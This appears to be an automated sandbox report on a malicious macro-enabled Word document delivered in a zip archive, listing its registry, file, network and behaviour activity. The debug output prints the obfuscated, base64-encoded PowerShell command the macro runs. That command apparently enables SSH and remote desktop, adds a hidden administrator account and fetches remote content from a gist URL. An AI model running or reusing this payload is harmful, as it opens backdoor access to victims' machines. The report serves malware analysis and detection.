(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\AppData\Local\Temp\SCP-001_Proposal.zip
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:	write	Name:	ShowPassword
Value: 0
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
Operation:	write	Name:	Word.DocumentMacroEnabled.12
Value:
(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:	write	Name:	{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value: 0100000000000000DE5EA0FF6611DB01
(PID) Process:	(4652) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:	write	Name:	0
Value: 017012000000001000B24E9A3E01000000000000000500000000000000

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
1132	powershell.exe	C:\Windows\Logs\DISM\dism.log		text
		MD5:6814EA65747CAF5D55135B641276C01E	SHA256:8B4E37FDF73A8A9F133D2E77086F5D31083277C067E1F4C39170731496125E30
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\AppxProvider.dll		executable
		MD5:396C483D62FEA5FA0FD442C8DC99D4EF	SHA256:36F2AF43F10FD76FEEF65BF574D79D3E27FD40DAF61249880511543C1F17AD91
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\AssocProvider.dll		executable
		MD5:B7DB592706D3EEFBCF0D5A166D462E56	SHA256:DE21321272862E7C332E1724DC315F06F3ABE7A0340E61D351CAB208D6BBF059
4528	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$DIb4528.179\SCP-001_Proposal.docm		document
		MD5:B5DDCFB8D43B13A9EEA30B4FEB1E6528	SHA256:24DB0811B8B086220CE4E5A812BDF2752810A16D28F77533773D91B0454F33D0
4652	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres		binary
		MD5:C63196088788B8AEBA680B8A04CFEB09	SHA256:7A797F13D7D7ACBE49F932941527A5F23AFF7D0BD9169D6291DF240C21C025E3
4652	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S		binary
		MD5:26DE2836727D7E4264197EFFEAD6F64D	SHA256:70BB529C2A6173287211718B9AF7C2991EE392DEDE0680894229455FB891E274
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ei24wtmy.xr5.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\CbsProvider.dll		executable
		MD5:14932441A96E254B3D29D452CE1263A0	SHA256:8FFF21CB7C88A0DD8C8E7B386604001F2974E75D229369A87BEE0BA18DA575F3
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\DismProv.dll		executable
		MD5:AB0DBC4F05B33EAAA447E31ACCAB8D21	SHA256:6A3C3F07BDDBC3079873F8799F2C19ADDDC59F15D6B2DBA6E9314E5626BFD2A0
1132	powershell.exe	C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\DismCorePS.dll		executable
		MD5:35A07968EC37231249F3F072AE555E3A	SHA256:E5F25E5A170CB3D165C3D143EAE967B96AB80F88FB09176DA8591B0B68C77E00

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	239.255.255.250:1900	—	—	—	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
6648	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4324	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4652	WINWORD.EXE	52.109.32.97:443	officeclient.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	GB	whitelisted
4652	WINWORD.EXE	52.113.194.132:443	ecs.office.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4652	WINWORD.EXE	23.53.40.82:443	omex.cdn.office.net	Akamai International B.V.	DE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 51.104.136.2	whitelisted
google.com	216.58.206.46	whitelisted
officeclient.microsoft.com	52.109.32.97	whitelisted
ecs.office.com	52.113.194.132	whitelisted
omex.cdn.office.net	23.53.40.82 23.53.40.25	whitelisted
messaging.lifecycle.office.com	52.111.231.13	whitelisted
self.events.data.microsoft.com	52.168.117.171	whitelisted
gist.githubusercontent.com	185.199.109.133 185.199.111.133 185.199.108.133 185.199.110.133	shared
metadata.templates.cdn.office.net	2.17.100.232 2.17.100.210	whitelisted
slscr.update.microsoft.com	20.114.59.183	whitelisted

Threats

No threats detected

Add for printing

Process	Message
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
powershell.exe	PID=1132 TID=1312 DismApi.dll: - DismInitializeInternal
powershell.exe	PID=1132 TID=1312 DismApi.dll: <----- Starting DismApi.dll session -----> - DismInitializeInternal
powershell.exe	PID=1132 TID=1312 DismApi.dll: - DismInitializeInternal
powershell.exe	PID=1132 TID=1312 DismApi.dll: Host machine information: OS Version=10.0.19045, Running architecture=amd64, Number of processors=4 - DismInitializeInternal
powershell.exe	PID=1132 TID=1312 DismApi.dll: API Version 10.0.19041.3758 - DismInitializeInternal
powershell.exe	PID=1132 TID=1312 DismApi.dll: Parent process command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -enc cwBFAFQALQBpAFQARQBtACAAIAB2AEEAcgBJAGEAQgBMAEUAOgBVAEQANAA1ACAAKABbAHQAWQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAtAEYAIAAnAGUAUgAnACwAJwBuAFYAJwAsACcAdABFAE0ALgBDAG8AJwAsACcAdAAnACwAJwBTAHkAUwAnACkAKQA7ACAAIAAkADUAeABiADIANwBzACAAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsANAB9AHsAMgB9ACIAIAAtAGYAJwBTAFkAJwAsACcATQAuACcALAAnAC4ARgBJAEwAZQAnACwAJwBzAHQAZQAnACwAJwBpAG8AJwApACAAIAA7ACAAIAAuACgAIgB7ADEAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAFcAJwAsACcAQQBkAGQAJwAsACcAdAB5ACcALAAnAGEAcABhAGIAaQBsAGkAJwAsACcAaQBuAGQAbwB3AHMAQwAnACwAJwAtACcAKQAgAC0ATwBuAGwAaQBuAGUAIAAtAE4AYQBtAGUAIAAoACIAewAwAH0AewAyAH0AewAzAH0AewA0AH0AewAxAH0AIgAtAGYAIAAnAE8AcAAnACwAJwBlAHIAdgBlAHIAJwAsACcAZQBuAFMAUwAnACwAJwBIACcALAAnAC4AUwAnACkACgAmACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAaQBjAGUAJwAsACcAUwB0AGEAcgB0AC0AUwBlACcALAAnAHIAdgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcwBzAGgAJwAsACcAZAAnACkACgAmACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAZQAnACwAJwAtAFMAZQByAHYAaQBjACcALAAnAFMAZQAnACwAJwB0ACcAKQAgAC0ATgBhAG0AZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHMAcwBoACcALAAnAGQAJwApACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHUAdABvACcALAAnAEEAJwApACwAJwBtACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGEAdAAnACwAJwBpAGMAJwApACkACgAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQAiAC0AZgAnAC0ATgAnACwAJwBlAHQARgBpAHIAZQB3AGEAJwAsACcAbABsACcALAAnAE4AZQB3ACcALAAnAFIAdQBsAGUAJwApACAALQBOAGEAbQBlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHMAJwAsACcAcwBoAGQAJwApACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAoACgAIgB7ADMAfQB7ADQAfQB7ADEAfQB7ADIAfQB7ADUAfQB7ADAAfQAiACAALQBmACAAJwBkACkAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAcgAnACwAJwBIACAAUwAnACkALAAnAHYAZQByACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AcAAnACwAJwBlAG4AUwAnACkALAAnAFMAJwAsACgAKAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHMAaAAnACwAJwAgACgAcwAnACkAKQApACkAKQAgAC0ARQBuAGEAYgBsAGUAZAAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQAnACwAJwBUAHIAdQAnACkAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHUAbgBkACcALAAnAEkAbgBiAG8AJwApACAALQBQAHIAbwB0AG8AYwBvAGwAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAFAAJwAsACcAVABDACcAKQAgAC0AQQBjAHQAaQBvAG4AIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAEEAbABsAG8AJwAsACcAdwAnACkAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAMgAyAAoALgAoACIAewAxAH0AewAwAH0AewAyAH0AewAzAH0AIgAtAGYAJwB0AGUAbQBQAHIAJwAsACcAUwBlAHQALQBJACcALAAnAG8AJwAsACcAcABlAHIAdAB5ACcAKQAgAC0AUABhAHQAaAAgACgAKAAoACIAewA0AH0AewA5AH0AewA1AH0AewAzAH0AewAwAH0AewAxAH0AewAxADAAfQB7ADgAfQB7ADEAMQB9AHsAMgB9AHsANwB9AHsANgB9ACIAIAAtAGYAIAAnAGUAdAB7ADAAfQBDACcALAAnAG8AbgB0AHIAbwBsAHsAMAB9AFQAZQByAG0AaQBuACcALAAnAHsAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAG4AJwAsACcAbwBuAHQAcgBvAGwAUwAnACwAJwB0AEMAJwApACwAJwBIAEsATAAnACwAJwBlACcALAAnAH0AJwAsACcAMAAnACwAJwBTAGUAcgAnACwAJwBNADoAewAwAH0AUwB5AHMAdABlAG0AewAwAH0AQwB1AHIAcgAnACwAJwBhAGwAIAAnACwAJwB2AGUAcgAnACkAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgACgAIgB7ADMAfQB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQAiACAALQBmACcAbwBuAHMAJwAsACcAZQAnACwAJwB0AGkAJwAsACcAZgBEACcALAAoACIAewAzAH0AewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGMAJwAsACcAeQBUACcALAAnAFMAQwBvAG4AbgBlACcALAAnAG4AJwApACkAIAAtAFYAYQBsAHUAZQAgADAACgAuACgAIgB7ADMAfQB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAGwAbAAnACwAJwBlAHcAYQAnACwAJwBSAHUAbABlACcALAAnAEUAbgBhAGIAbABlAC0ATgAnACwAJwBlAHQARgBpAHIAJwApACAALQBEAGkAcwBwAGwAYQB5AEcAcgBvAHUAcAAgACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAawB0AG8AJwAsACcARABlAHMAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnACAAJwAsACcAbwB0AGUAJwAsACcAUgBlAG0AJwApACwAJwBwACcAKQAKACQAewBNAEEAQQBhAGAATgBBAGEAYABBAGAATwBhAEEAfQAgAD0AIAAoACIAewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAZABhAHQAaQAnACwAJwBiACcALAAnAG8AbgBfACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwBrAHUAcAAnACwAJwBhACcAKQAsACcAZgAnACwAJwBvAHUAbgAnACkACgAkAHsAQgBBAEEAQQBDAGAAQQBBAGAAQQBEAH0AIAA9ACAAKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsAMgB9AHsANgB9AHsAMAB9AHsANQB
powershell.exe	9AHsANwB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYQAnACwAJwA1ADgARQAnACkALAAnADMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAVQBuAGQANAAnACwAJwBPACcAKQAsACcAZgAnACwAJwB0AEgAJwAsACcAZQBOACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbwBuAGgAJwAsACcAVAAxACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUAB3ACcALAAnAE4AZQBEACEAJwApACkACgAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcALQBMAG8AYwBhAGwAVQBzACcALAAnAGUAcgAnACwAJwBOAGUAdwAnACkAIAAtAE4AYQBtAGUAIAAkAHsATQBhAGEAYQBgAE4AYABBAGEAQQBPAGAAQQBhAH0AIAAtAFAAYQBzAHMAdwBvAHIAZAAgACgALgAoACIAewAyAH0AewAxAH0AewAzAH0AewA0AH0AewAwAH0AIgAtAGYAJwByAGkAbgBnACcALAAnAG8AbgB2ACcALAAnAEMAJwAsACcAZQByAHQAVABvAC0AUwBlAGMAdQAnACwAJwByAGUAUwB0ACcAKQAgACQAewBCAEEAYQBgAEEAYABDAGAAQQBBAEEAZAB9ACAALQBBAHMAUABsAGEAaQBuAFQAZQB4AHQAIAAtAEYAbwByAGMAZQApACAALQBGAHUAbABsAE4AYQBtAGUAIAAoACIAewAxAH0AewA3AH0AewA1AH0AewA0AH0AewAwAH0AewAzAH0AewA2AH0AewAyAH0AIgAtAGYAIAAnACAAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbwB1AG4AJwAsACcARgAnACkALAAnAHUAbgB0ACcALAAnAEEAYwBjACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAgAEIAYQBjAGsAJwAsACcAdQBwACcAKQAsACcAbwBuACcALAAnAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQAnACwAJwBkAGEAdAAnACkAKQAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAKAAiAHsANAB9AHsAMgB9AHsANQB9AHsAMQB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAIAAnAG8AdQBuACcALAAnAEEAYwBjACcALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAdABpAG8AJwAsACcAbgAnACwAJwAgAEIAJwApACwAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8AdQBuAGQAYQAnACwAJwBGACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcAcAAnACwAJwAgACcALAAnAGEAYwBrAHUAJwApACkACgAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADUAfQB7ADAAfQB7ADQAfQAiAC0AZgAgACcAdQAnACwAJwBjAGEAbABHAHIAJwAsACcATABvACcALAAnAEEAZABkAC0AJwAsACcAcABNAGUAbQBiAGUAcgAnACwAJwBvACcAKQAgAC0ARwByAG8AdQBwACAAKAAiAHsAMQB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACAAJwBvAHIAcwAnACwAJwBBAGQAbQAnACwAJwBpACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAcgBhACcALAAnAG4AaQBzAHQAJwApACkAIAAtAE0AZQBtAGIAZQByACAAJAB7AG0AYQBhAGAAQQBuAGAAQQBBAGEAYABPAEEAQQB9AAoAJAB7AGIAYABBAGEAZgBDAEEAYQBmAH0AIAA9ACAAKAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAtAE8AYgAnACwAJwBqAGUAYwB0ACcALAAnAE4AZQB3ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0AZgAgACcAbgB0ACcALAAnAGUAJwAsACcAdAAuAFcAZQBiAEMAbABpACcALAAnAGUAJwAsACcATgAnACkAKQAuACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAByAGkAbgBnACcALAAnAGwAbwBhAGQAUwAnACwAJwB3AG4AJwAsACcARABvACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMQAzAH0AewA4AH0AewAxADgAfQB7ADcAfQB7ADEANgB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQA1AH0AewAxADAAfQB7ADEAMgB9AHsAMQB9AHsAMQA5AH0AewAxADcAfQB7ADMAfQB7ADAAfQB7ADEANAB9AHsAOQB9AHsAMgAwAH0AewAxADEAfQB7ADYAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAMwBiACcALAAnADYANQAnACkALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAMABhACcALAAnAGMAZgA2AGIAOQAxADYAJwAsACcAYwBjAGEAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AYwBvACcALAAnAHQAJwApACwAKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBiACcALAAnADcAJwAsACcAOQAwACcALAAnADQAMgAxADYAJwAsACcAZABiADEAMABhADUAJwAsACcAZgAyADAANAA3ADgAZgAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG8AJwAsACcAbgB0AGUAbgAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAC8AJwAsACcAegBhACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGQALgB0AHgAJwAsACcAdAAnACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAHQAaAAnACwAJwBpACcALAAnAHUAYgB1AHMAZQAnACkALAAnAHQAdAAnACwAJwA2ADcAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAGUAYQA4ACcALAAnADMAJwAsACcANgAxADUANAAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAHAAYQB5AGwAJwAsACcAbwBhACcALAAnADMAOABiAGUANgAvACcAKQAsACcAMABmACcALAAnAGgAJwAsACcANgBkACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAGMAaAB3ACcALAAnADcAMABjADYAMAAnACwAJwBvAG4AZwAwADIALwBjACcAKQAsACcAcgBjACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAHcALwA5AGYAZgAyACcALAAnAGEAJwAsACcANAAvAHIAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC8AZwAnACwAJwBpAHMAdAAnACwAJwBwAHMAOgAvACcALAAnAC4AZwAnACkALAAnADIAYQBmACcALAAnADUANQAnACkAKQAKACQAewBEAGAARQBBAGAAQQBkAGYAYABBAGEAZAB9ACAAPQAgACAAIAAkAFUAZAA0ADUAOgA6ACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwA0AFMAJwAsACcAYQBzAGUANgAnACwAJwBpAG4AZwAnACwAJwB0AHIAJwAsACcARgByAG8AbQBCACcAKQAuAE

General Info

SCP-001_Proposal.zip

0D8F182CD7FE53E4AADE3F300A93A930

4B5B0BD6FD98CBC4A77C56426E5CA46CACF3A456

D7C85EC49D12420BEBDAD1544AC45210AED070FCF4F2A6FE0BDE327E505FE1E7

3072:KivLxGKFBiiFXzLUH3zB3AStEPn28ZUpF:KijUKFBdXzIH3zBVtE2OUpF

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

SUSPICIOUS

Executable content was dropped or overwritten

Starts a Microsoft application from unusual location

Base64-obfuscated command line is found

BASE64 encoded PowerShell command has been detected

Starts POWERSHELL.EXE for commands execution

Reads security settings of Internet Explorer

Process drops legitimate windows executable

INFO

The process uses the downloaded file

The executable file from the user directory is run by the Powershell process

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings